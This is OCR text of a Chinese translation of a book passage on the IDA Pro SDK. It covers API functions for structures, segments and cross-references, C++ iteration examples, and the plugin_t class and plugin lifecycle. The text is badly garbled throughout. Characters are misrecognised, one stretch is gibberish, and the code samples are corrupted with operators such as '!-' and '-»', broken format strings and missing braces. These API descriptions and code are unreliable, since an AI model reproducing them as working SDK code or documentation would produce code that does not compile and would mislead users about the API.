D get func name(ea t addr, char *name, size t namesize)， 将 包含 指定 地 址 的 函数 的 名 
称 复制 到 消 数 提供 的 名 称 缓冲 区 中 。 
O struc t *get frame(ea t addr)， 返 回 一 个 指 癌 struc t 对 象 的 指针 ，struc t 对 象 描述 包 
含 指定 地 址 的 函数 的 栈 帧 。 
5. 操纵 结构 体 
struc t 类 用 于 访问 在 类 型 库 中 定义 的 函数 栈 帧 及 结构 化 数据 类 型 。 这 里 介绍 了 与 结构 体 及 其 
相关 成 员 交 互 的 一 些 基本 函数 。 其 中 许多 函数 利用 一 个 类 型 ID ( tid ) 数据 类 型 。API 包括 在 一 
个 struc t E—4 THER tidt 之 间 建 立 对 应 关系 的 函数 。 注意 ,struc_t AI member t 类 都 包含 一 
个 fidt 数 据 成 员 , 因此 ,如 采 你 已 经 有 一 个 指向 有 效 struc t zx member_t 对 象 的 指针 ,你 就 可 
以 轻易 获得 类 型 ID 信息 。 
O tid t get struc id(char *name)， 根 据 名 称 查 询 一 个 结构 体 的 类 型 ID。 
O struc t *get struc(tid t id)， 获 得 一 个 指 回 struc t 对 象 的 指针 ， 该 对 象 表示 由 给 定 类 
型 ID 指定 的 结构 体 。 
D asize t get struc size(struc t *s)， 返 回 给 定 结构 体 的 字 节 大 小 。 
口 member t *get member(struc t *s, asize t offset)， 返 回 一 个 指 回 member t 对 和 象 的 指针 ， 
该 对 象 撕 述 位 于 给 定 结构 体 指 定 offset 位 置 的 结构 体 成 员 。 
D) member t *get member by name(struc t *s, char *name)， 返 回 一 个 指 癌 member t 对 象 的 
指针 ， 该 对 和 象 描述 由 给 定 的 name 标 识 的 结构 体 成 员 。 
O tid t add struc(uval t index, char *name, bool is union=false)， 将 一 个 给 定 name 的 
新 结构 体 附 加 到 标准 结构 体 列 表 中 ,该 结构 体 还 被 添加 到 Structures 徐 口 的 给 定 index 位 置 。 
如 果 index 为 BADADDR， 则 该 结构 体 被 添加 到 Structures 窗 口 的 结尾 部 分 。 
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Q add struc member(struc t *s, char "name, ea t offset, flags t flags, typeinfo t *info, 
asize t size) 在 给 定 结构 体 中 添加 一 个 给 定 name 的 新 成 员 。 该 成 员 要 么 添加 到 结构 体 中 
给 定 的 offset 位 置 ， 如 果 offset 为 BADADDR， 则 附加 到 结构 体 未 尾 。flags 参 数 描述 新 成 员 
的 数据 类 型 。 有 效 的 标志 使 用 在 bytes.hpp 文 件 中 描述 的 FF XXX? XE X.» info ZG BH 
关 复 杂 数 据 类 型 的 额外 信息 ， 对 于 原始 数据 类 型 ， 它 被 设置 为 NULL。typeinfo tt 数据 类 型 
在 nalt.hpp 文 件 中 定义 。size 参 数 指定 新 成 员 占 用 的 字 市 数 。 

6. 操纵 段 

segment t 类 存储 与 数据 库 中 不 同 段 (如 .text 和 .data ) 有 关 的 信息 ， 这 些 段 可 通过 

View > Open Subviews >» Segments 窗口 查看 。 如 前 所 述 ,， 各 种 可 执行 文件 格式 (如 PE 和 ELF ) 38 
常 将 IDA 术语 段 称 为 节 。 下面 的 函数 可 用 于 访问 segment t 对 象 。 其 他 处 理 segment t 类 的 函数 
在 segment.hpp 文件 中 声明 。 

口 segment t *getseg(ea t addr), 返回 一 个 指 癌 segment tt 对象 的 指针 , 该 对 象 包含 给 定 的 地 址 。 

口 segment t *ida export get segm by name(char *name), ， 用 给 定 的 名 称 返回 一 个 指 同 
segment t 对 象 的 指针 。 

D! add segm(ea t para, ea t start, ea t end, char "name, char *sclass)， 在 当前 数据 库 
中 创建 一 个 段 。 段 的 边界 由 start (包括 ) 和 end (不 包括 ) 地 址 参数 指定 ， 段 的 名 称 则 由 
name 参 数 指定 。 该 段 的 类 描述 被 创建 的 段 的 类 型 。 预 定义 的 类 包括 CODE 和 DATA。 请 参阅 
segment.hpp 文 件 ， 获 取 预 定义 类 的 完整 列表 。 如 果 使 用 分 段 地 址 (seg:offset), start 
和 end 将 被 解释 为 偏 移 量 而 不 是 虚拟 地 址 ， 这 时 ，para 参 数 描述 节 的 基 址 。 如 果 没 有 使 用 
分 段 地 址 ， 或 者 所 有 段 以 零 为 基数 ， 则 这 个 参数 应 设置 为 去 。 

口 add sem ex(segment t *s, char "name, char *sclass, int flags)， 是 另 一 种 新 建 段 的 
方法 。 你 应 该 设置 s 字 段 ， 以 反映 段 的 地 址 范围 。 该 段 根据 name 和 sc1ass 参 数 命 名 和 分 类 。 
flags 参 数 应 设置 为 在 segment.hpp 文 件 中 定义 的 一 个 ADDSEG XXX 值 。 

O int get segm qty()， 返 回 数据 库 中 的 节 的 数量 。 

O segment t *getnseg(int n)， 返 回 一 个 指 癌 segment tt 对象 的 指针 ， 该 对 象 包含 与 数据 库 
中 第 z 个 程序 节 有 关 的 信息 。 

D int set segm name(segment t *s, char *name，...)， 更 改 给 定 段 的 名 称 。 将 name 作 为 格 
式 化 字符 串 处 理 ， 并 合并 该 格式 化 字符 串 所 知 的 任何 其 他 参数 ， 即 构成 段 的 名 称 。 

口 get segm name(ea t addr, char *name, size t namesize)， 将 包含 给 定 地 址 的 段 的 名 称 
复制 到 用 户 提供 的 name 绥 冲 区 中 。 注意 , IDA 可 能 会 对 name 进 行 过 滤 , 使 用 一 个 哑 字 符 ( 通 
第 为 ida.cfg 中 SubstChar 指 定 的 一 个 下 划 线 ) 蔡 换 其 中 的 无 效 字 符 ( 在 ida.cfg 中 没有 指定 为 
NameChars 的 字符 )。 

口 get zem name(segment t *s, char *name, size t namesize)， 将 给 定 段 的 可 能 已 经 被 过 
滤 的 名 称 复制 到 用 户 提供 的 name 绥 种 区 中 。 

D get true segm name(segment t *s, char *name, size t namesize)， 将 给 定 段 的 准确 名 称 
复制 到 用 户 提供 的 name 绥 冲 区 中 ， 不 过 滤 任 何 字符 。 









































在 创建 段 时 ,必须 使 用 一 个 add_segm 函数 。 仅 仅 声 明和 初始 化 一 个 segment. tou ZR, 实际 上 
并 不 能 在 数据 库 中 创建 一 个 段 。 所 有 包装 类 (如 func t 和 struc t) 均 是 如 此 。 这 些 类 仅仅 提供 
一 种 便捷 的 方法 来 访问 一 个 基本 数据 库 实 体 的 属性 。 要 创建 、 修 改 或 删除 具体 的 数据 库 对 象 , 你 
必须 使 用 适当 的 孔 数 ， 以 对 数据 库 进行 永久 性 更 改 。 
7. 代码 交叉 引用 
在 xref.hpp 中 定义 的 许多 了 为 数 和 枚 举 背 量 〈 部 分 如 下 所 示 ) 可 用 于 访问 代码 交叉 引用 信息 。 
O get first cref from(ea t from)， 返 回 给 定 地 址 回 其 转交 控制 权 的 第 一 个 位 置 。 如 采 给 
定 的 地 址 没有 引用 其 他 地 址 ， 则 返回 BADADDR (-1)« 
O get next cref from(ea t from, ea t current)， 如 采 current 已 经 由 前 一 个 对 get first | 
cref from 或 get_next_cref from 的 调用 返回 ， 则 返回 给 定 地 址 ( from) 问 其 转交 控制 权 的 
下 一 个 位 置 。 如 果 没 有 其 他 交叉 引用 存在 ， 则 返回 BADADDR。 
O get first cref tolea t to) 返 回 向 给 定 地 址 转交 控制 权 的 第 一 个 位 置 。 如 果 不 存在 对 给 
定 地 址 的 引用 ， 则 返回 BADADDR (11 
O get next cref to(ea t to, ea t current)， 如 末 current 已 经 由 前 一 个 对 get first cref to 
或 get next cref to 的 调用 返回 ， 则 返回 癌 给 定 地 址 (to ) 转交 控制 权 的 下 一 个 位 置 。 如 
果 没 有 对 给 定 地 址 的 其 他 交叉 引用 ， 则 返回 BADADDR。 
8. 数据 交叉 引用 
访问 数据 交叉 引用 信息 的 晒 数 (也 在 xref.hpp 中 声明 ) 与 用 于 访问 代码 交叉 引用 信息 的 函数 
韭 党 类似。 这些 也 数 如 下 所 示 。 
O get frist dref from(ea t from)， 返 回 给 定 地 址 癌 其 引用 一 个 数据 值 的 第 一 个 位 置 。 如 
果 给 定 地 址 没有 引用 其 他 地 址 ， 则 返回 BADADDR (-1 )。 
O get next dref from(ea t from, ea t current)， 如 采 current 已 经 由 前 一 个 对 get first | 
dref from 或 get next dref from 的 调用 返回 ， 则 返回 给 定 地 址 (from) 回 其 引用 一 个 数据 
值 的 下 一 个 位 置 。 如 果 没 有 其 他 交叉 引用 存在 ， 则 返回 BADADDR。 
O get first dref tolea t to)， 返 回 将 给 定 地 址 作为 数据 引用 的 第 一 个 位 置 。 如 果 没 有 对 
给 定 地 址 的 引用 ， 则 返回 BADADDR (-1). 
Q get next dref to(ea t to, ea t current)， 如 有 果 current 已 经 由 前 一 个 对 get first 
dref to 或 get next dref to 的 调用 返回 , 则 返回 将 给 定 地 址 ( to ) 作为 数据 引用 的 下 一 个 
位 置 。 如 果 没 有 其 他 对 给 定位 置 的 交叉 引用 ， 则 返回 BADADDR。 
SDK 中 没有 与 IDC 的 XrefType 对 应 的 函数 。 虽 然 xref.hpp 文件 声明 了 一 个 名 为 1astXR 的 变 
量 , 但 SDK 并 不 导出 这 个 变量 。 如 末 你 需要 确定 一 个 交叉 引用 的 类 型 ， 你 必须 使 用 xrefblk t 
结构 体 迭 代 交 又 引用 。 我 们 将 在 下 一 市 中 讨论 xrefblk t 结构 体 。 


16.2.5 IDA APIR KIS 


通常 , 使 用 IDA API 能 以 几 种 不 同 的 方式 迭代 数据 库 对 象 。 在 下 面 的 例子 中 ,我 们 将 说 明 一 
些 第 用 的 迭代 技巧 。 
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1. 枚 举 函 数 
人 夺 代 数据 库 中 国 数 的 第 一 种 技巧 与 使 用 IDC 脚本 迭代 函数 的 方法 类 似 : 


for (func t *f = get next func(0); f !- NULL; f = get next func(f-»startEA)) { 
char fname[1024]; 
get func name(f-»startEA, fname, sizeof(fname)); 
msg(" 08x: Zen, f-»startEA, fname); 

} 


为 外 ， 我 们 可 以 直接 按 有 引号 碗 代 孙 数 ， 如 下 面 的 例子 所 示 : 











for (int idx = 0; idx < get func qty(); idx++) { 
char fname[1024]; 
func t *f = getn func(idx); 
get func name(f-»startEA, fname, sizeof(fname)); 
msg(" 08x: Zen, f-»startEA, fname); 

} 


最 后 ,我们 可 以 采用 一 种 较为 低级 的 方法 ， 利 用 一 个 由 area.hpp 文件 定义 的 名 为 areacb t 
的 数据 结构 ( 也 叫做 区 域 控制 块 ) 区 域 控 制 块 用 于 维护 相关 的 area tt 对 象 的 列表 ,一 个 名 为 funcs 
的 全 局 areacb t 变量 作为 IDA API 的 一 部 分 导出 (在 funcs.hpp 文件 中 )。 使 用 areacb t 2$, mij 
面 的 例子 可 以 改写 为 : 





€ int a = funcs.get next area(0); 
while (a !- -1) 1 
char fname[1024]; 
e func t *f = (func t*)funcs.getn area(a); // getn area returns an area t 
get func name(f-»startEA, fname, sizeof(fname)); 
msg(" 08x: Zen, f-»startEA, fname); 
e a - funcs.get next area(f-»startEA); 


i 


在 这 个 例子 中 , get next area 成 员 函 数 (@ 和 人 @@ ) 用 于 重复 为 funcs 控制 块 中 的 每 一 个 区 域 
获得 索引 值 。 通 过 回 getn area 成 员 函 数 提供 每 个 索引 信 (和 目 )， 可 以 获得 一 个 指 问 每 个 相关 的 
func 芋 区 域 的 指针 。SDKE 中 声明 了 几 个 全 局 areacb t 变量 , 包括 segs 全 局 变量 , 它 是 一 个 区 域 
控制 块 ， 其 中 包含 二 进 制 文件 中 每 太 的 segment. t 指针。 

2. 枚 举 结构 体 成 员 

Æ SDK F, 使 用 struc 芋 类 的 功能 可 以 模拟 栈 帧 。 代 码 清 单 16-6 中 的 例子 利用 结构 体 成 员 
迭代 来 打印 一 个 栈 帧 的 内 容 。 


代码 清单 16-6” 枚 举 栈 帧 成 员 
func t *func = get func(get screen ea()); //get function at cursor location 
msg("Local variable size is %d\n", func-»frsize); 
msg("Saved regs size is %d\n", func-»frregs); 
struc t *frame - get frame(func); //get pointer to stack frame 
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if (frame) { 
size t ret addr = func->frsize + func->frregs; //offset to return address 
for (size t m = 0; m < frame->memqty; m++) { //loop through members 
char fname[1024]; 
get member name(frame-»members[m].id, fname, sizeof(fname)); 
if (frame-»members[m].soff « func-»frsize) ( 
msg("Local variable "); 


else if (frame-»members[m].soff > ret addr) { 
msg("Parameter "); 


msg("%s is at frame offset %x\n", fname, frame-»members[m].soff); 
if (frame-»members[m].soff == ret addr) ( 

msg("%s is the saved return addressNn", fname); 
} 


} 
} 


这 个 例子 使 用 从 一 个 函数 的 func. t 对象 及 其 相关 struc 鞋 类 (代表 该 国 数 的 栈 帧 ) 中 获得 的 
HE, ， 概 括 介绍 该 困 数 的 栈 帧 。frsize 和 frregs 字段 分 别 指定 栈 帧 局 部 变量 部 分 的 大 小 ， 以 及 

供 已 保存 寄存 器 专用 的 字 节 的 数量 。 在 局 部 变量 和 已 保存 寄存 器 后 面 的 帧 中 , 可 以 找到 已 保存 的 
返回 地 址 。 在 帧 中 ，memqty 字段 指定 帧 结构 中 已 定义 成 员 的 数量 ， 它 也 对 应 于 members 数组 的 大 
小 。 这 个 例子 使 用 一 个 循环 检索 每 个 成 员 的 名 称 , 并 根据 某 成 员 在 帧 结构 中 的 起 始 信 移 量 ( soff ), 
确定 该 成 员 是 一 个 局 部 变量 还 是 一 个 参数 。 

3. 枚 举 交 叉 引 用 

在 第 15 章 中 提 到 过 ， 我 们 可 以 使 用 IDC 脚本 枚 举 交 叉 引 用 。SDK 也 提供 相同 的 功能 ， 只 是 
它 实现 这 种 功能 的 方式 稍 有 不 同 。 现在 我 们 回 到 前 面 列举 对 某 个 函数 的 所 有 调用 的 例子 ( 见 代 码 
清单 15-4 )。 下面 的 函数 几乎 可 以 实现 相同 的 功能 。 


void list callers(char *bad func) { 
char name buf[MAXNAMELEN]; 
ea t func = get name ea(BADADDR, bad func); 
if (func -- BADADDR) { 
warning("Sorry, %s not found in database", bad func); 
j 
else { 
for (ea t addr - get first cref to(func); addr !- BADADDR; 
addr = get next cref to(func, addr)) { 
char *name - get func name(addr, name buf, sizeof(name buf)); 
if (name) { 
msg("%s is called from Ox%x in %s\n", bad func, addr, name); 























else { 
msg(" s is called from Ox%x\n", bad func, addr); 
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之 所 以 说 这 个 函数 几乎 可 以 实现 相同 的 功能 , 是 因为 你 没有 办 法 确定 循环 的 每 次 近 代 返回 的 
交叉 引用 的 类 型 ( 如 前 所 述 ，SDK 中 没有 与 IDC 的 XrefType 对 应 的 函数 )。 在 这 种 情况 下 , dfi] 
应 进行 验证 : 对 给 定 函 数 的 交叉 引用 实际 上 是 调用 (fl_CN 或 fl_CF ) 交叉 引用 。 

如 果 你 需要 确定 SDK 中 的 一 个 交叉 引用 的 类 型 ， 你 必须 使 用 xrefblk t 结构 体 提供 的 为 
种 迭代 交叉 引用 的 方法 ,xref.hpp 文件 描述 了 这 个 结构 体 ,xrefblkt 结构 体 的 基本 布局 如 下 所 示 。 
(请 参阅 xref.hpp 文件 了 解 详情 。) 


struct xrefblk t { 
ea t from; // the referencing address - filled by first to(),next to() 














ea t to; // the referenced address - filled by first from(), next from() 
uchar iscode; // 1-is code reference; O-is data reference 

uchar type; // type of the last returned reference 

uchar user; // 1-is user defined xref, O-defined by ida 


//fill the "to" field with the first address to which "from" refers. 
© bool first from(ea t from, int flags); 


//fill the "to" field with the next address to which "from" refers. 
//This function assumes a previous call to first from. 
© bool next from(void); 


//fill the "from" field with the first address that refers to "to". 
O bool first to(ea t to, int flags); 


//fill the "from" field with the next address that refers to "to". 
//This function assumes a previous call to first to. 
O bool next to(void); 
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xrefblk t 的 成 员 函 数 用 于 初始 化 结构 体 (C @ 和 @ ) FHER Ce O )， 而 数据 成 员 则 用 
于 访问 与 检索 到 的 最 后 一 个 交叉 引用 有 关 的 信息 .first from 和 first to 函数 需要 的 flags 值 规 
定 应 返回 何 种 交叉 引用 类 型 。flags 参数 的 合法 值 如 下 ( 取 自 xref.hpp 文件 ): 

















#define XREF ALL 0x00 // return all references 
#define XREF_FAR 0x01 // don't return ordinary flow xrefs 
#define XREF DATA 0x02 // return data references only 








需要 注意 的 是 , A AEREE EKI AARRE AREL Ho WRIA H 
感 兴趣 , 你 必须 将 xrefblk t type 字段 与 特定 的 交叉 引用 类 型 (如 f1 ON ) 相 比较 , 或 检查 iscode 
字段 ， 以 确定 最 后 返回 的 交叉 引用 是 否 为 代码 交叉 引用 。 

下 面 1ist_callers 函数 的 修订 版 本 说 明了 一 个 xrefblk t 迭代 结构 体 的 用 法 : 














void list callers(char *bad func) { 
char name buf[MAXNAMELEN | ; 
ea t func = get name ea(BADADDR, bad func); 
if (func == BADADDR) { 
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warning("Sorry, %s not found in database", bad func); 
J 
else { 
xrefblk t xr; 
for (bool ok = xr.first to(func, XREF ALL); ok; ok = xr.next to()) ( 


o if (xr.type !- fl CN && xr.type !- fl CF) continue; 

char *name - get func name(xr.from, name buf, sizeof(name buf)); 

if (name) { 
msg("%s is called from OxXx in Senf, bad func, xr.from, name); 

} 

else { 
msg("%s is called from Ox%x\n", bad func, xr.from); 

} 

} 
I 
} 


现在 , 我 们 使 用 xrefblk t ZR n] EUIS EXT tik eA HRA ( 9 ), 并 确 
定 它 是 否 对 我 们 有 用 。 在 这 个 例子 中 , 我 们 完全 忽略 了 任何 与 困 数 调用 无 关 的 交叉 引用 。 我 们 并 
没有 使 用 xrefblk t 的 iscode 成 员 , 因为 它 不 仅 可 以 确定 调用 交叉 引用 , 还 可 以 确定 跳 转 和 普通 
流 交 叉 引 用 。 因 此 ， 仅 使 用 iscode 并 不 能 保证 当前 的 交叉 引用 与 一 个 函数 调用 有 关 。 














16.3 Jä 











本 章 中 描述 的 函数 和 数据 结构 仅仅 是 IDA API 的 冰山 一 角 。 对 于 我 们 讨论 的 每 一 类 函数 , 还 
有 更 多 API 哨 数 可 以 执行 更 加 特殊 的 任务 ， 与 使 用 IDC 脚本 相 比 ， 它 们 能 够 对 各 种 数据 库 元 系 
进行 更 加 细 化 的 控制 。 下 面 几 章 将 详细 介绍 如 何 构建 插件 模块 、 加 载 带 模 块 和 处 理 名 模块 ,并 继 
续 深 入 讨论 SDK 的 功能 。 





IDA 插件 体系 结构 





本 书 接 下 来 的 几 章 中， 我 们 将 介绍 可 以 使 用 IDA SDK 创建 的 各 种 模块 ， 还 将 介绍 一 些 
十 新 特性 ( HM IDA 5.7 以 来 )， 这 些 特性 允许 使 用 一 种 IDA 脚本 语言 来 开发 相同 类 型 的 
模块 。 无 论 你 是 否 想 要 建立 自己 的 插件 ， 了 人 解 插件 的 基础 知识 将 大 大 提高 你 使 用 IDA. 的 效率 ， 
这 是 因为 ， 绝 大 多 数 为 IDA 开发 的 第 三 方 软件 都 是 以 插件 形式 发 布 的 。 本 章 将 开始 学 习 IDA 模 
块 ， 讨 论 IDA 插件 的 用 途 ， 以 及 如 何 创 建 、 安 装 和 配置 插件 。 
可 以 这 样 说 : 插件 是 经 过 编译 的 、 功 能 更 加 强大 的 IDC 脚本 。 插 件 通常 与 热 键 和 菜单 项 关 
K, 并 且 只 有 在 数据 库 打开 后 才能 使 用 。 插件 可 能 是 通用 的 ,可 以 处 理 各 种 二 进 制 文件 或 者 供 各 
种 处 理 需 体 系 结构 使 用 。 搬 件 也 可 能 非常 专门 化 , 仅 供 某 个 特殊 的 文件 或 处 理 絮 使 用 。 由 于 是 被 
编译 的 模块 ， 无 论 是 哪 一 种 情况 ， 插 件 都 能 够 完全 访问 IDAAPI。 同 时 ， 与 仅仅 使 用 脚本 相 比 ， 
插件 还 能 够 执行 更 加 复杂 的 任务 。 
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所 有 IDA 模块 (包括 插件 ) 都 以 适用 于 执行 插件 的 平台 的 共享 库 组件 实 现 。 在 IDA 的 模块 
化 体系 结构 下 ， 模 块 不 需要 导出 任何 图 数 。 而 每 个 模块 必须 导出 某 个 特定 类 的 一 个 变量 。 就 插件 
而 言 ， 这 个 类 叫做 plugin t, ČE SDK 的 loader.hpp 文件 中 定义 。 




















IDA API ln 


|] SDK 49[] 0 O He-RaysD [LO DL DO DB] IPADL D ELO LEE ULU HE DEL CUI APIO UI 
ung 亚太 可 加 可 加 可 本 丁丁 
加 
D ECE D A T e SDKDUUDUD HexcRas D DUUDUDUDUDUDU ARIDUDOUD D D LI D] 
(DDUUDUDUUDU UU UHesc-Raas ll UD UU No OBSOLETE FUNCSEE HT BEO HOLD CI 
E ABIECTA LET DELLI AI JE OD DIT EDI EIL BIBIT E D UE BL D D] BEBE H Dr SEX [LETT 
[L| E] BS E] EE NU OBSOLETE. FUN) 


为 了 了 解 如 何 创建 插件 ， 必 须 首 先 了 解 plugin t 类 以 及 其 中 的 数据 字段 ( 这 个 类 没有 成 员 
PRA). plugin 七 类 的 布局 如 下 所 示 ， 其 中 的 注释 摘 目 loaderhpp 文件 : 
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class plugin t { 


public: 
int version; // Should be equal to IDP INTERFACE VERSION 
int flags; // Features of the plugin 


int (idaapi* init)(void); // Initialize plugin 

void (idaapi* term)(void);  // Terminate plugin. This function will be called 
// when the plugin is unloaded. May be NULL. 

void (idaapi* run)(int arg); // Invoke plugin 


char *comment; // Long comment about the plugin 

char *help; // Multiline help about the plugin 

char *wanted name; // The preferred short name of the plugin 

char *wanted hotkey; // The preferred hotkey to run the plugin 
n 


每 个 插件 都 必须 导出 一 个 名 为 PLUGIN 的 plugin tog. SH PLUGIN 对 象 由 loaderhpp 文件 
处 理 , 而 声明 和 初始 化 具体 的 对 和 象 则 由 你 自己 负责 。 因 为 成 功 创建 插件 取决 于 正确 初始 化 这 个 对 
象 ， 下 面 我 们 描述 它 的 每 个 成 员 的 作用 。 请 注意 ， 即 使 你 宁愿 使 用 IDA 新 引入 的 脚本 化 插件 功 
能 ， 你 仍然 需要 了 解 这 里 的 每 一 个 字段 ， 因 为 它们 也 用 在 脚本 化 插件 中 。 

O version。 这 个 成 员 指 出 用 于 构建 插件 的 IDA. 的 版 本 号 。 通 常 ， 它 被 设置 为 在 idp.hpp X 

件 中 声明 的 IDP INTERFACE VERSION 常量 。 自 SDK 4.9 版 对 API 进行 标准 化 以 来 ， 这 个 常 
量 的 值 一 直 没 有 改变 。 使 用 这 个 字段 的 最 初 目的 是 防止 由 早期 版 本 的 SDK 创建 的 插件 加 
载 到 由 更 新 版 本 的 SDK 创建 的 IDA 中 。 

D flags。 这 个 字段 包含 各 种 标志 ， 它 们 规定 DA 在 不 同 的 情况 下 该 如 何 处 理 插件 。 这 些 标 

志 使 用 在 loader.hpp 文件 中 定义 的 PLUGIN. XXX 常量 的 按 位 组 合 来 设置 。 一般 来 说 , 将 这 个 
字段 赋值 为 去 就 够 了 了。 请 参阅 loader.hpp 文件 ， 了 解 每 个 标志 位 的 意义 。 
O init。 这 是 plugin t 类 所 包含 的 3 个 函数 指针 中 的 第 一 个 指针 。 这 个 特殊 的 成 员 是 一 个 指 
问 插 件 的 初始 化 函数 的 指针 。 该 孔 数 没有 参数 ， 返 回 一 个 into IDA JS HTC BAG, RIF 
加 载 你 的 插件 。 插 件 初始 化 将 在 17.1.2 节 讨 论 。 

O term。 这 个 成 员 是 男 一 个 函数 指针 。 妆 插件 种 载 持 ，IDA 将 调用 相关 函数 。 该 亢 数 没有 
参数 ， 也 不 返回 任何 值 。 在 IDA 名 载 你 的 插件 之 前 ， 这 个 函数 用 于 执行 插件 所 需 的 任何 
清理 任务 ( 释放 内 存 、 结 束 处 理 、 保 存 状 态 等 ) 如 果 在 插件 被 番 载 时 ， 你 不 需要 执行 任 
何 操作 ， 你 可 以 将 这 个 字段 设置 为 NULL。 

D run。 这 个 成 员 指 向 一 个 函数 ， 只 要 用 户 激 活 ( 通过 热 键 、 菜 单项 或 脚本 调用 ) 你 的 插件 ， 
都 应 调用 这 个 函数 。 这 个 函数 是 任何 插件 的 核心 组 件 ， 因 为 用 户 正 是 通过 它 定义 插件 行 
为 的 。 将 脚本 与 插件 进行 比较 时 ， 这 个 函数 的 行为 与 脚本 语言 的 行为 极 相似 。 这 个 也 数 
接受 唯一 一 个 整数 参数 ( 将 在 17.1.4 节 讨 论 ) 且 不 返回 任何 值 。 

O comment。 这 个 成 员 是 指 癌 一 个 字符 串 的 指针 ， 这 个 字符 串 代 表 插 件 的 一 条 注释 。IDA 

并 不 耻 接 使 用 这 个 成 员 ， 你 完全 可 以 将 它 设置 为 NULL- 

O help. 这 个 成 员 是 指 癌 一 个 字符 串 的 指针 ,这 个 字符 串 充 当 一 个 多 行 帮助 字符 串 。IDA 并 

不 直接 使 用 这 个 成 员 ， 你 完全 可 以 将 它 设 置 为 NULL。 
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D wanted_name。 这 个 成 员 是 指向 一 个 字符 串 的 指针 ， 这 个 字符 串 保 存 插件 的 名 称 。 当 一 
个 插件 被 加 载 时 ， 这 个 字符 串 被 添加 到 Edit > Plugins 菜单 中 ， 提 供 一 种 激活 该 插件 的 方 
法 。 对 于 已 加 载 的 插件 ， 你 没有 必要 对 它们 使 用 唯一 的 名 称 ， 但是， 从 有 亲 单 中 选择 一 个 
插件 名 称 后 ， 如 果 有 两 个 插件 全 都 使 用 这 个 名 称 ， 你 很 难 确定 到 底 哪 一 个 插件 被 激活 。 

O wanted_hotkey。 这 个 成 员 是 指 回 一 个 字符 串 的 指针 ， 这 个 字符 串 保 存 IDA 尝试 与 插件 
关联 的 热 键 (如 ALT-F8) 的 名 称 。 同 样 ， 这 时 IDA 也 不 要 求 你 对 已 加 载 的 插件 使 用 唯 
一 的 名 称 。 但 是 ， 如 采 插 件 的 名 称 并 不 唯一 ， 热 键 将 与 请 求 关联 的 最 后 一 个 插件 相关 联 。 
17.4 方 讨论 了 用 户 该 如 何 重 写 wanted hotkey fH. 

下 面 是 一 个 初始 化 plugin t 对 象 的 例子 : 














int idaapi idaboook plugin init(void); 
void idaapi idaboook plugin term(void); 
void idaapi idaboook plugin run(int arg); 


char idabook comment[] = "This is an example of a plugin"; 
char idabook name[] = "Idabook"; 
char idabook hotkey = "Alt-F9"; 


plugin t PLUGIN = { 
IDP INTERFACE VERSION, O, idaboook plugin init, idaboook plugin term, 
idaboook plugin run, idabook comment, NULL, idabook name, idabook hotkey 


e 
plugin t 类 所 包含 的 函数 指针 允许 IDA 定位 你 的 插件 所 需 的 函数 ， 而 不 需要 你 导出 这 些 也 
数 ， 或 为 它们 选择 特定 的 名 称 。 


17.1.1 插件 生命 周期 


一 般 的 IDA 会 话 从 启动 IDA 应 用 程序 本 号 开始 ， 然 后 是 加 载 和 自动 分 析 一 个 新 的 二 进 制 文 
件 或 现 有 的 数据 库 ， 最 后 等 待 用 户 交 互 。 在 这 个 过 程 中 ，IDA 为 插件 提供 了 3 个 加 载 的 机 会 。 

(1) 插件 可 以 在 IDA 启动 后 立即 加 载 ,而 不 管 数 据 库 是 否 加 载 -PLUGITN.flags 中 的 FLUGIN FIX 
位 控制 这 种 加 载 方 式 。 

(2) 插件 可 以 在 处 理 融 模块 加 载 后 立即 加 载 ， 并 且 在 处 理 需 模块 番 载 前 一 直 驻 留 在 内 存 中 。 
PLUGIN. flags 中 的 FLUGIN PROC 位 控制 插件 与 处 理 需 模 块 之 间 的 关联 。 

(3) 如 果 不 存在 上 面 提 到 的 标志 位 , 则 每 次 IDA 打开 一 个 数据 库 , IDA 都 为 插件 提供 加 载 机 会 。 

IDA 通过 调用 PLUGIN. init 为 插件 提供 加 载 机 会 。 一 旦 被 调用 ,， init er HCH Te IDA 的 当前 
状态 ,决定 是 否 加 载 插件 。 加 载 插件 时 ,“ 当 前 状态 ”的 意义 取决 于 上 述 3 种 情形 中 的 适用 情形 。 
插件 可 能 感 兴趣 的 状态 包括 输入 文件 类 型 ( 例如 ， 插 件 可 能 专门 为 PE 文件 设计 ) 和 处 理 器 类 型 
(插件 可 能 专门 为 x86 二 进 制 文件 设计 )。 

为 了 向 IDA RKE RE, PLUGIN. init 必须 返回 以 下 在 loader.hpp 文件 中 定义 的 一 个 值 。 

口 PLUGIN SKIP。 返 回 这 个 值 表示 不 应 加 载 插 件 。 
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Q PLUGIN OK。 返 回 这 个 值 告诉 IDA 为 当前 数据 库 加 载 插件 。 如 果 用 户 使 用 一 个 荣 单 操作 或 
热 键 激活 插件 ，IDA 将 加 载 该 插件 。 

Q PLUGIN KEEP。 返 回 这 个 值 告诉 IDA 为 当前 数据 库 加 载 插件 ， 并 且 使 插件 驻 留 在 内 存 中 。 

插件 加 载 后 , 你 可 以 通过 两 种 方式 激活 它 。 使 用 采 单 项 或 热 键 是 激活 插件 的 最 常用 方法 。 
次 以 这 种 方式 激活 插件 ，IDA 将 调用 PLUGIN.run, 将 控制 权 转 交 给 插件 。 另 一 种 激活 插件 的 方法 
是 使 插件 “ 钓 住 ”IDA 的 事件 通知 系统 。 在 这 种 情况 下 ， 捅 件 必 须 对 一 种 或 多 种 类 型 的 IDA 事 
件 表示 兴趣 ， 并 注册 一 个 回调 函数 ， 以 便 在 发 生 有 趣 的 事件 时 供 IDA 调用 。 

frd EHI, IDA 将 调用 PLUGIN.term (假设 它 不 是 NULL )。 锚 载 插件 的 情形 因 
PLUGIN. flags 中 设置 的 位 而 异 。 没 有 指定 标志 位 的 插件 将 根据 PLUGIN.in 让 返回 的 值 进行 加 载 。 
如 果 要 加 载 插件 的 数据 库 关 财 ， 插 件 也 随 之 印 载 。 

如 果 一 个 插件 指定 了 PLUGIN UNL 标志 位 ， 则 每 次 调用 PLUGIN. run 后 ,该 插件 将 被 邑 载 。 随 后 每 
次 激活 这 些 插件 时 ， 都 必须 重新 加 载 ( 导致 调用 PLUGIN. init) 它们 。 如 果 插 件 指定 了 PLUGIN PROCS 
标志 位 ， 在 它们 为 其 加 载 的 处 理 带 模块 秃 载 后 ， 它 们 也 随 之 印 载 。 一 旦 数据 库 关 闭 ， 人 处理 带 模 块 也 
DG BIA. fnUn. Far [I PLUGIN EIN 标志 位 的 插件 只 有 在 IDA 本 刁 终止 时 才 会 印 载 。 


17.1.2. 插件 初始 化 


